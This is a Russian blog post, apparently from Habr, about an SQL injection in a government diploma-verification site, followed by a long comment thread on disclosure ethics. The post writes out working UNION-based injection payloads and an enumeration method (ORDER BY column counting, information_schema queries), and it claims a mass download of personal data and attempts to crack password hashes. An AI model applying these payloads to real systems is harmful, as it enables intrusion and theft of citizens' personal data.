И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках

Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.

image

Внимание: не пытайтесь повторять действия, описанные в публикации и им подобные. Помните о ст. 272 УК РФ «Неправомерный доступ к компьютерной информации».

Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).

image

Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2>
<p>SQLSTATE[42601]: Syntax error: 7 ERROR:  syntax error at or near "4"
LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U...
                                                             ^</p>

Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.

Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция
...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…

В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора')) AND (doc.education_level_id = '4') AND (U…

В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit

Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора')) AND (doc.education_level_id = '4') AND (U…

Ответ:

"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…

Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…

Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…

UPD: Большое спасибо всем, кто эту новость разнёс. Надеюсь, эта история закрыта, так как баг на оригинальном сайте пофиксили. Буквально через час после опубликования статьи сайт ограничили, а через несколько часов сайт снова восстановил работу, но уже без обнаруженной уязвимости. Очень рад, что администрация сайта так быстро и слажено отреагировала. Приношу извинения администрации сайта за то, что пришлось так кардинально сообщить об уязвимости, возможно, я был глубоко не прав, но дыра была заделана быстро и без промедления. Приношу извинения всем, кому пришлось тяжело в этот понедельник из-за этого. Попытаюсь оправдать себя: конечно же, никакой базы у меня нет, на протяжении 3-ёх дней я эмулировал скачивание, надеясь, что необычный трафик заподозрят.
Поделиться публикацией
Похожие публикации
Ммм, длинные выходные!
Самое время просмотреть заказы на Фрилансим.
Мне повезёт!
Реклама
Комментарии 815
  • +42
    Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием

    Не стоит публиковать открытые дыры на хабре.
    Все же сначала лучше написать администрации и уведомить, что будет публикация уязвимости через Х дней.
    • +49
      И, не теряя времени, начать собирать вещи и сушить сухари. Нафиг-нафиг.
      • –10
        Однако я находил две серьезных уязвимости на mos.ru, репортил их и проблем не было.
        • +75
          Я сто раз перебегал дорогу на красный свет и проблем не было.
          • +28
            Тут должно быть сообщение того кто перебежал дорогу на красный свет всего один раз и получил проблемы. Но он не может, так как проблемы оказались серьезные.
              • –6
                Ну так и переходящий на «зеленый» регулярно погибают. Не имея на руках подробной статистики по ДТП на регулируемых пешеходных переходах, разбитой по группам «перебегающих» и времени суток, невозможно дать обоснованный ответ на вопрос что безопаснее: перебегать на красный или переходить на зеленый. Бытовая логика подсказывает, что зеленый безопаснее, но где гарантия, что это не устоявшийся миф или устаревшая информация? В конечном итоге, кому вы больше доверяете — незнакомому вам водителю, который может отвлечься, потерять управление или ехать на неисправном ТС или своей оценке?
                • +1
                  Либо я метафору не понял, либо Вы не в ту степь пошли.

                  Допрос:
                  — Людям свойственно ошибаться, рано или поздно это всегда случается.
                  — Это ошибочное суждение, основанное на непонятных данных. Что если вы в состоянии поймать только тех, кто совершает ошибки? Это ведь исказило бы вашу статистику, разве нет?
                  (с) Лютер
              • 0
                Я один раз перебежал (поленился дойти до светофора) и отделался выговором. А мог бы и не выговором. Так что, не перебегаю с тех пор.
                • +2
                  А мне как-то штраф возле родного универа вкатали. Продолжаю перебегать, предварительно убедившись в отсутствии помех (т.е. инспекторов).
                  • 0

                    Пора переходить на следующий уровень: не перебегать, а идти неспеша на красный.

                    • 0
                      Не надо так — если один-два таких человека пойдут неспеша на красный, то велика вероятность, что остальные на автомате полезут за ними, даже не посмотрев на светофор…
                      • 0
                        Я так и делал. Там (около универа) все равно не улица, а парковка, зря только светофор стоит :-)
                      • 0
                        То есть транспорт уже и не помеха?
                        • 0
                          Возле Университета было место, где народ переходил «накопившись». Когда человек 10-15 начинают одновременно переходить на красный — водители останавливаются…
                          • 0
                            У нас была кнопочка на столбе для такого.
                            • –1
                              В прошлом веке там никаких кнопочек не было точно.
                    • 0
                      Проблема была не серьезная, отделался трещиной в бедренной кости. С тех пор прошло лет 15, с тех пор не перебегаю, да и на зеленый перехожу после полной остановки машин ))
                      • 0
                        Мда… Я до сих пор с благодарностью вспоминаю водителя грузовика, который остановился, не поленился выйти и наорать на меня (лет 12 было). Что-то в голове перещёлкнуло, с тех пор не перебегаю. Если бы не наорал — так бы и бегал, наверно, какое-то время.
                    • +3
                      Однажды я перебежал на красный, было очень очень больно.
                      ОЧЕНЬ.
                      • +1
                        Я один раз перебежал, теперь не могу даже ходить.
                        • –6
                          Тоже сразу в паблик информацию кидали? Или как нормальные люди — в поддержку сервиса?
                          • 0
                            только поддержка у них, как по мне, не «нормальная»
                          • 0
                            Есть противоположный опыт пусть и не госниками, но около того. Да, без каких-либо последствий, но, как говорится «ложечки то нашлись, но ...».
                            • 0
                              а куда репортили?
                              как реагировала поддержка?
                              «пришлите то, что только что написали»?
                              я позавчера обнаружил, что с мобильной версии под Android (точнее, если User-agent браузера содержит строку "android") на mos.ru невозможно зарегистрироваться, зарепортил им, на запрос описания ошибки приложил подробное описание со скриншотами, только для примера указал номер телефона не свой, а все девятки, а мне в ответ
                              Для работы с Порталом необходимо вводить федеральные номера вида +7-9ХХ-ххх-хх-хх.

                              ха-ха… а я о чём писал?
                              *там ещё косяков, типа, «невозможно отправить обращение в техподдержку, будучи залогиненным», «при вводе кода подтверждения не срабатывает Enter — нужно кликать на „подтвердить“, etc… (как будто школьники писали)....
                              • 0
                                Через форму на сайте.
                                В первый раз реакция была так себе.
                                Во второй, более серьезный подход был, уязвимость тоже был серьезной. Можно было подать воду на любую жилую площадь. Т.е. скажем соседям сверху, написать 50 кубов.
                            • +19
                              Нет, почему, я бы вполне мог создать одноразовую почту на каком-нибудь зарубежном сервисе и написать им с него. Но, давайте честно, вместо того, чтобы прикрыть уязвимость, будут сначала пытаться искать отправителя. А сейчас, когда, я надеюсь, набегут скрипт-кидди или реально серьёзные люди до данных — они будут вынуждены сначала закрыть сайт, а потом латать дыры.
                              • +12
                                они будут вынуждены сначала закрыть сайт, а потом латать дыры.

                                Тем временем, сайт уже не работает.
                                • +1
                                  он уже больше часа не работает :)
                                  • 0

                                    До сих пор не работает.

                                    • +1
                                      Экранирование для всех параметров сделать — это вам не тяп-ляп за пять минут… Боюсь, что большую часть будет быстрее переписать с нуля, в плане заботы о безопасности, чем пытаться обезопасить текущую версию…
                                      • +2
                                        Вчера сайт открывался быстро, и уязвимость уже была устранена (по крайней мере, эксплуатировать ее так, как описано в статье, не получалось).
                                • 0
                                  «А давайте, если мы обнаружим дыру в заборе, то сначала напишем про неё. Меня не найдут. Но потом, если уж даже взорвут весь забор – они будут вынуждены признать несовершенство своего забора. И пофиг, что успеют разворовать за это время»…

                                  Простите, но ничего, кроме такого вот жёсткого стёба, подобная логика не вызывает. На кону база по дипломам миллионов людей, которые не имеют совершенно никакого отношения к этому вот нашему «скрипт-спорту». И Вы сейчас открыто публикуете подсказки по тому, как конкретно (!) её ломать.
                                  А если эту базу реально и по-крупному ломанут??? Я «выживу». Вы «выживете». Думаю, и большая часть комментаторов «выживет». А с остальным «подавляющим большинством» как быть? Об этом мыслей не было???

                                  P.S. Во многом настолько резкий ответ продиктован чрезвычайно агрессивной реакцией Вашей образовавшейся «группы поддержки» (которую Вы уж точно не заказывали, она внезапно образовалась сама по себе, в чём Вам верю, честное слово!).
                                  • +1
                                    Я бы хотел рассказать о моих мыслях о причинах существования этой дыры:
                                    1. Сайт делался на коленке и дыра просто была упущена. В 95% случаях я не первый, кто её заметил. Возможное решение: дабы ускорить пресечение пользования дырой рассказать об этом громко и чётко, так как официальное обращение растянуло бы этот срок.
                                    2. Сайт делался на коленке, но разработчику было известно о дыре. И хуже того, было известно о том, что её используют. В 95% случаях я не первый, кто её заметил. Возможное решение: рассказать о дыре незамедлительно, чтобы у администраторов точно не было поводов и отмазок оставлять дыру незакрытой. К тому же сказать, что я всё скачал и так может сделать любой.

                                    И раз уже в 95% случаях (цифра выдуманная, но я думаю, Вы со мной согласитесь) дыру уже нашли и ею пользовались, а все до сих пор живы — значит тут работает более крупная схема, для которой, наоборот, выгодно, чтобы подавляющее большинство было «живым». Это моя логика, но она может быть неверна.
                                    • 0
                                      1) Склоняюсь именно к такому варианту событий.
                                      2) Тут, думаю, вряд ли. Умный админ-злоумышленник может сделать гораздо более изящный «ключик для своих». А глупый админ-злоумышленник просто не догадается прятать «вход» в настолько очевидных и палевных вещах. Впрочем, это просто ИМХО.

                                      В любом случае, как уже много раз тут указывал – публичное оглашение всех деталей явно привлекло в дыру на порядки большее количество «желающих проверить», чем было ранее. И вот среди них уже могло быть немало настоящих злоумышленников.
                                      И в итоге вреда от публикации получится гораздо больше, чем пользы (вновь напоминаю всю преамбулу истории с прошлогодними массовыми атаками, в которой пострадало множество обычных юзеров). Сейчас у нас нет никаких гарантий, что полная база уже не на чёрном рынке. Очень надеюсь, что это не так – в этом случае уже даже закрытие дыры никак не поможет, как понимаете…

                                      Вот именно об этой простой логике (продумать все последствия) и именно об этой профессиональной этике («не навреди обычным пользователям») шла речь во всех моих комментариях…
                                      • +1
                                        Вы знаете, вы правы, я совершенно не задумывался о том, что это привлечёт внимание хакеров. И считаю, что правильно сделал. То, о чём вы говорите — очень притянуто за уши. Вы хоть раз заходили на этот сайт? Пробовали как-то с ним взаимодействовать? Запросики там смотреть? Вконтакте очень популярный сайт со сложной системой, «хакеров», пытающихся его взломать набирается тысячи ежедневно. Одноклассники те же. Сайт Пентагона, если уж говорить о классике. И это всё сложные сайты, и что-то я не замечаю, что их взламывали ежедневно из-за того, что много народа пытается это сделать. Тут же одна страничка! Она отправляет пост запрос. Страница при этом выводит ровно ту информацию, которая есть в БД, либо не выводит ничего. Совершить ещё одну ошибку на этом ресурсе просто невозможно. Если вы со мной несогласны — я не хочу спорить. Просто приведите пример возможной уязвимости этой страницы. Желательно проверьте, есть ли место ей быть. Если да — то я заберу свои слова обратно. Да и вообще — это государственный сайт, он первый в поиске по запросу проверки дипломов, им пользуются практически все уважающие себя работодатели, на него ведут кучу других государственных и негосударственных сайтов. А я, значит, внимание привлекаю.

                                        P.S.: Скажу честно, привлечение внимание к сайту, на котором уже заделана дыра — очень уж, по-моему, притянутая придирка. Не то чтобы я пытаюсь обелить себя, но тут своей вины точно не вижу, ну не верю я. Можем остаться при своих мнениях, вряд ли я изменю своё — а вы своё. Если спор не изменит чьего-либо мнения, то он не нужен. Но я надеюсь, что следующий свой ответ вы аргументируете так, что не согласиться с ним будет невозможно
                                        • 0
                                          А я, значит, внимание привлекаю.

                                          Вы привлекаете внимание не к самому ресурсу, а к дыре в нём. Это несколько разные вещи, мягко говоря…

                                          Можем остаться при своих мнениях, вряд ли я изменю своё — а вы своё. Если спор не изменит чьего-либо мнения, то он не нужен.

                                          Согласен. Тут по каждой из наших позиций – либо понимать, либо нет. Третьего просто не дано. И компромиссы невозможны, судя по всему.
                                • +4
                                  Администрация как-то по-другому относится к публикующим уязвимости на хабре, жалеет их что ли? :)
                                  • 0
                                    Ну так с левой почты через TOR отправить. Или с protonmail какой-нибудь.
                                  • +5
                                    Абсолютно согласен! Ну опубликуйте Вы статью через неделю, дайте людям закрыть дыру. Да и кашу Вы заварили круче, чем если бы сообщили о проблеме.
                                    • +10
                                      А кто будет закрывать? Сайт, наверняка, делался по тендеру за минимальную плату. У студентов, которым достались копейки за создание сайта — уже и договор кончился.

                                      Это прямое следствие структуры госзакупок (кто предложил наименьшую цену — тот и молодец) и непонимая того, что сделать сайт мало — его ещё поддерживать нужно!

                                      Пока это не изменится — вариантов нет. Не с кем там работать в настоящее время. Просто не с кем.

                                      Вот когда накопится определённое количество «пожаров» и денег, срочно выделенных на «затыкание дыр» и появятся люди, с которыми есть о чём говорить, как в Гугле или Яндексе — тогда да, тогда смысл появится…
                                      • 0

                                        Гарантийное обслуживание никто не отменял.

                                        • 0
                                          Это не совсем так. Я сам некоторое количество лет назад был таким студентом, который по госзакупке в рамках университетской практики делал сайт для муниципального образования.
                                          Поддержка там определённая, скорее всего, будет прописана. Но отношение подрядчика (работодателя студента) к этой задаче будет очень легкомысленным, т.к. те деньги, которые заявляют обычно за такие заказы обычно не очень включают в себя много поддержки.
                                          В конкретно моём случае, несмотря на то, что я к задаче подходил ответственно, ресурсы разработки достаточно быстро были перекинуты с этого проекта на другие проекты коммерческих заказчиков.
                                          Правда, в случае моего проекта это вылилось в не до конца реализованную функциональность, а не дырявый сайт. Но это тоже сомнительный плюс.
                                          • –2
                                            Сайт, наверняка, делался по тендеру за минимальную плату. У студентов, которым достались копейки за создание сайта — уже и договор кончился.

                                            Согласен.
                                            Но очевидные коррупционные косяки структуры госзакупок не отменяют того факта, что от публикации этой информации теоретически может пострадать множество обычных людей, к этой самой структуре не имеющие вообще никакого отношения…
                                            • +2

                                              Вы путаете причину и следствие — люди страдают не от публикации, а потому, что "этой самой структуре" плевать на защиту данных этих людей.

                                              • –5
                                                Это вы путаете причину и следствие.
                                                Люди страдают не столько от самих косяков защиты – сколько от того, что кто-то публично (!) озвучил эти косяки защиты. Что позволяет ломануться в эти дыры всем желающим – даже тем, кто ранее про эти уязвимости даже не знал. Я ведь не зря тут ранее уже вспоминал прошлогодние вирусные атаки – в которых абсолютно большая часть вины лежала как раз на тех, кто уязвимости опубликовал…
                                                • +5

                                                  Единственные "люди", которые страдают от публичности — те, которые хотели бы этой публичности избежать. В данном случае — чиновники, у которых из-за этой публичности могут начаться неприятности.


                                                  Все остальные люди страдают от самого факта наличия этой дыры. Потому что если о ней не знает владелец сайта, либо знает, но недостаточно мотивирован на то, чтобы эту дыру закрыть — значит этой дырой пользуются те, кто нашёл её ранее и решил использовать в личных целях.


                                                  Что касается теоретического увеличения количества пострадавших из числа "остальных людей" в результате публичного раскрытия… доля истины в этом, безусловно, есть. Тем не менее, я считаю что эти люди пострадали не в результате full disclosure, а потому, что государство сначала не проконтролировало безопасность проекта, и потом сделало всё, чтобы отбить у исследователей желание следовать responsible disclosure. Если Вас не устраивает такая логика, и Вы предпочитаете считать виновным не того, кто является причиной проблемы, а того, кто причинил конкретный вред — тогда вина не на исследователе нашедшем и опубликовавшем дыру, а на том взломщике, который воспользовался этой дырой для нанесения вреда конкретным людям.

                                                  • 0
                                                    Единственные «люди», которые страдают от публичности — те, которые хотели бы этой публичности избежать.


                                                    Вы знаете, пострадать могут не только чиновники. Вы точно не пострадаете? Хотя, можете в подтверждение своих слов публично выложить: ваше ФИО, дипломы об образовании (серия, номер, год поступления, год окончания), также СНИЛС, ИНН, серию и номер паспорта, дату рождения, также ваш email для регистрации, логин и пароль от сайта, если вы на нём зарегистрированы?

                                                    • +1

                                                      Вы путаете пострадавших от того, что их данные не защищены, и пострадавших от того, что этот факт публично вскрыли.

                                                      • +1
                                                        Ну так вот пусть пострадавшие от вскрытия данных обращаются в суд на того, кто недостаточно их защитил. Тот, кто недостаточно их защитил, при этом вполне вправе подать в суд на взломщика, но это не отменит его вины в недостаточности защиты данных и необходимости компенсировать страдания пострадавших. Хотя о чём это я, это же Россия — тут всем плевать и на данные, и на взлом, и уж тем более на пострадавших.
                                                    • 0
                                                      Все остальные люди страдают от самого факта наличия этой дыры.

                                                      Прежде всего – люди страдают не «от самого факта наличия этой дыры». А от того, что кто-то этой дырой пользуется.
                                                      И вот после публикации – количество последних резко увеличивается, как правило.

                                                      Публично описывая дыру в заборе – вы сразу же резко увеличиваете количество тех, кто в эту дыру полезет. Поскольку среди тех, кто прочтёт эту вашу информацию-«подсказку» – находятся далеко не только добросовестные люди.

                                                      Поэтому важнее всего – закрыть дыру, а не раструбить о ней по всей сети. Если, конечно, вы заботитесь именно о людях (чьи данные лежат в той базе), а не о собственном пиаре или каких-то иных «принципах» (которые у вас почему-то оказываются выше людей)…

                                                      Как ещё понятнее объяснить этот момент, на каком языке???
                                                      • +2

                                                        Да всё вполне понятно. Конечно, закрыть важнее, и лучше всего сделать это по-тихому. Никто с этим и не спорит.


                                                        Проблема в том, что текущая политика такова, что государство не заинтересовано в том, чтобы закрывать дыры по-тихому, оно заинтересовано в том, чтобы люди опасались эту дыры искать, а найдя опасались о них рассказывать. Эта стратегия, при успехе, приведёт к тому, что чиновники не будут нести никакой ответственности за дыры, потому что все, кто о них знают будут молчать или тихо использовать в личных целях. Больше всех при успехе этой стратегии пострадают как раз обычные люди, а чиновники и криминал будут в шоколаде. И единственный способ сорвать эту стратегию — full disclosure, который и чиновникам не даст замести проблему под ковёр, и криминалу попортит налаженный бизнес.


                                                        И хотя в краткосрочной перспективе может пострадать чуть больше обычных людей, в долгосрочной это пойдёт им на пользу.

                                                        • 0
                                                          Простите, но вот про «государство заинтересовано в молчании» – дичайшая конспирология.
                                                          Даже при всей моей нелюбви к сами-знаете-кому… Но дискредитировать собственные же дипломы – явно не в их интересах. Особенно после совсем недавнего скандала (ну, вы поняли, о ком речь)).

                                                          Для любого государства (каким бы… эээ… «суверенным» оно ни было)) этот вот «вопрос престижа» своих документов – гораздо важнее вопросов личных интересов отдельных персон (максимум, подобное разрешается лишь в виде «отдельных случаев»). И это прекрасно понимают даже самые отмороженные личности.

                                                          Поэтому тот самый пропагандируемый вами «full disclosure», конкретно в данном случае – как раз-таки ставит под удар 99% совершенно обычных людей, лишь 1% из которых «блатные» и всякие прочие «придворные».
                                                          Стоит ли оно того???
                                                          • +1
                                                            Простите, но вот про «государство заинтересовано в молчании» – дичайшая конспирология.

                                                            Никакой конспирологии, это абсолютно прозрачные выводы из факта преследования по закону тех, кто пытался сообщать о дырах по принципу responsible disclosure. Понятно, что не у всех есть возможность выплачивать за это вознаграждения, но в любом случае реакция на responsible disclosure должна быть настолько позитивной, насколько это возможно — если не могут дать денег, то хотя бы могут выложить благодарность за бесплатную помощь в улучшении безопасности их сайта… хотя бы на этом же самом сайте. Когда вместо этого исследователей пытаются найти и наказать — где тут конспирология, ведь всё совершенно очевидно?


                                                            Более того, по текущим законам исследователи действительно виновны, если действовали без предварительного разрешения владельца сайта. И вот пока эти законы никто не пытается изменить, или хотя бы саботировать их применение на практике — говорить что в таком отношении заинтересовано государство вполне корректно.

                                                            • 0
                                                              Я тут уже неоднократно писал о том, что любой хоть сколь-либо стоящий спец – всегда знает, как обеспечить себе максимальную анонимность.
                                                              Поэтому все дальнейшие рассуждения про «найдут и накажут» – простите уж, но выглядят крайне сомнительно. Особенно в свете нынешних «тёплых(сарказм)» отношений с Западом – где богатейший выбор почт на любой вкус…

                                                              А решить все описанные проблемы – в их же интересах. Тут же ж понты дороже результата.
                                                              • +2

                                                                Я не хакер, но около 20 лет активно интересуюсь безопасностью с целью защиты своих серверов как админ и своих проектов как разработчик. Лет 5 назад написал здесь статью Немножно анонимен. В общем, в категорию "сколь-либо стоящий спец" я, вроде бы, должен попасть. И я Вам уже писал, что для обеспечивания уровня анонимности "выше среднего" придётся и деньги тратить, и, скорее всего, совершать противозаконные действия. Просто комбинация Tor и VPN это, в моём понимании, начально-минимальный уровень анонимности — против государства этого уровня недостаточно.


                                                                Если Вы знаете какой-то другой способ, как обеспечить анонимность против розыска спецслужбами, который не требует ни заметных финансов ни противозаконных действий — просветите нас, пожалуйста. А без конкретики "любой хоть сколь-либо стоящий спец – всегда знает, как обеспечить себе максимальную анонимность" звучит как "тыж программист".

                                                                • 0
                                                                  Да к чему вообще такие заморочки? ))
                                                                  Как минимум, пользоваться текущей внешнеполитической ситуацией: когда «наши» ресурсы особо не выдают информацию «ихним», но, что самое главное – и наоборот (поправьте, пожалуйста, если ошибаюсь).

                                                                  Ну, а всякие там Торы и прочие… ИМХО, это либо уж для совсем левых дел, либо для «шапочек из фольги».
                                                                  • +1
                                                                    Да к чему вообще такие заморочки? ))

                                                                    Чтобы желание сделать доброе дело не привело к реальному сроку.


                                                                    И что касается наших и ихних — скорее всего в делах вроде розыска мелких хакеров они продолжают сотрудничать, потому что это выгодно обеим сторонам. Именно поэтому на Tor полагаться нельзя — может ФСБ он и не по зубам, но вот АНБ его прослеживать в состоянии, как минимум частично.


                                                                    Подход в стиле "открыть новый аккаунт на gmail для отправки письма, они ничего нашим не выдадут" — это и есть вариант "одноразовый" этичный хакер.


                                                                    Но я понял, что Вы имели в виду под "обеспечить себе максимальную анонимность" — нет, это не максимальная, и нет, это не помешает Вас найти, причём довольно быстро.

                                                                    • 0
                                                                      Я вовсе не спорю, что текущее российское законодательство конкретно в сфере IT, мягко говоря, «не блещет интеллектом» (впрочем, оно и в прочих сферах особо не блещет, но это уже совершенно другие вопросы))…

                                                                      Но вот конкретно в том (ну, если уж принять за некую «действующую модель» именно Ваше описание), что касается всяческих «гадостей» друг о друге между противоборствующими структурами – вот тут эти точно друг другу ничего не дают. Ибо «интересы» там всякие, «лояльность агентов» и прочие сопли…

                                                                      Поэтому, ИМХО, хотите «не светиться» в российских структурах – всяческие Gmail и иже с ним. Хотите наоборот – всяческие Mail.ru и иже с ним. Ну, и так далее…
                                                                      • 0

                                                                        По-моему, рассчитывать на холодные внешнеполитические отношения чтобы обеспечить себе анонимность по чисто уголовному расследованию, в котором не замешаны ни политика, ни большой бизнес, очень опрометчиво.

                                                                        • 0
                                                                          Ну пока действует – почему бы и не воспользоваться, ради благого-то дела? Особенно если заботитесь действительно об оказавшихся под угрозой пользователях…

                                                                          Тем более, что на Западе «белый» хакинг вовсе не запрещён, насколько помню. Поэтому вполне могут даже и открыто отказать в предоставлении данных.

                                                                          P.S. Разумеется, это вовсе не «панацея» – есть и другие способы скрыть свою личность гораздо более надёжно (особенно для реального специалиста). Это всего лишь как наиболее простейший вариант, самый доступный даже для тех самых «кидди»…
                                                                          • 0

                                                                            Откуда у вас уверенность, что пока действует? Мне бы не хотелось проверять на своей шкуре, до, как минимум, официального выхода США или России из договоров о правовой взаимопомощи, включая выход минимум одной из них из Интерпола. Вот кстати, пример взаимопомощи между государствами в куда более худших отношениях чем Россия и США: "с января по июль 2015 года Генпрокуратура РФ приняла решение о выдаче на Украину 25 запрашиваемых лиц, в то время как украинская сторона решила выдать российским силовикам только 12 беглецов." Вы будете рассчитывать на то Россия не выдаст вас Украине и наоборот по внешнеполитическим соображениям, если совершите обычное уголовное преступление.

                                                                            • 0
                                                                              Я же указал, что это лишь самый простой способ, из разряда «минимально необходимых». Ну для кого был PS-то? )
                                                                              • 0

                                                                                Я вообще не считаю это способом.

                                          • 0

                                            На мой взгдяд все было сделано правильно.

                                          • +21
                                            Интересный тренд. Гос и прочие структуры на сообщения об уязвимости на их информационных ресурсах не устраняют оные, но преследуют граждан по доброй воле сообщившие об этом.
                                            — Добрый день господа, на вашем ресурсе по адресу … обнаружена уязвимость…
                                            Уведомляю вас что через семь дней будет размещена публикация о подобном случае, она поможет вам мотивировать разработчиков для устранения несоответствия.
                                            как то так.
                                            • +45
                                              И в ответ:

                                              Добрый день, Александр Дорощенко, на вас заведено дело о неправомерном доступе, о шантаже и ещё какое-нибудь. Ваша информация очень важна для нас, мы обязательно с вами свяжемся в ближайшие 10 лет.

                                              -=-=-

                                              Я считаю, что владельцам сайтов необходимо заслуживать привелегию получать данные о дырах первыми.
                                              • +13
